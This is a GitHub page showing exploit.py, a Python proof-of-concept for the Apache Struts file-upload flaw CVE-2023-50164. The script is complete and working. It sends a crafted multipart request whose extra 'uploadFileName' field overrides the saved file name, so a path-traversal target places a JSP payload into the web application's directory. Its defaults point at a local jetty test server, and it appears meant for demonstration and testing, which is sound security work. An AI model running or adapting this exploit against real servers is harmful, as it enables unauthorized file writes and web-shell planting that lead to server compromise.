-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
55 lines (46 loc) · 2.48 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import os
import sys
import string
import random
import argparse
import requests
from urllib.parse import urlparse, urlunparse
from requests_toolbelt import MultipartEncoder
from requests.exceptions import ConnectionError
HTTP_UPLOAD_PARAM_NAME = "upload"
def upload_file(url:str, payload:str, target_path:str, proxy_servers:dict, legit:bool):
file_content = open(payload, "rb").read()
if legit:
files = {
HTTP_UPLOAD_PARAM_NAME.capitalize(): (target_path, file_content, "application/octet-stream")
}
else:
files = {
HTTP_UPLOAD_PARAM_NAME.capitalize(): (target_path, file_content, "application/octet-stream"),
HTTP_UPLOAD_PARAM_NAME+"FileName": target_path
}
boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=files, boundary=boundary)
headers = {"Content-Type": m.content_type}
try:
response = requests.post(url, headers=headers, data=m, proxies=proxy_servers, verify=False)
print(f"Upload completed with HTTP response code {response.status_code}")
except requests.RequestException as e:
print("Error while uploading: ", e)
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Upload a file to an application server using the Struts vulnerability CVE-2023-50164")
parser.add_argument("--url", required=False, default="http://localhost:9999/foo/upload.action", help="Endpoint URL (default after 'jetty:run': http://localhost:9999/foo.upload.action)")
parser.add_argument("--payload", required=False, default="payload/foo.jsp", help="File to upload (default: payload/foo.jsp)")
parser.add_argument("--target", required=False, default="../src/main/webapp/foo.jsp", help="Target path relative to the intended upload directory 'uploads' (default: ../src/main/webapp/foo.jsp)")
parser.add_argument("--proxy", required=False, default=None, help="Proxy URL (default: none)")
parser.add_argument("--legit", action='store_const', const=True, required=False, default=False, help="Send legit request (default: False)")
args = parser.parse_args()
print(f"Uploading [{args.payload}] to [{args.url}], saving as [{args.target}] ...")
proxy_servers = None
if args.proxy:
proxy_servers = {
'http': args.proxy,
'https': args.proxy,
}
upload_file(args.url, args.payload, args.target, proxy_servers, args.legit)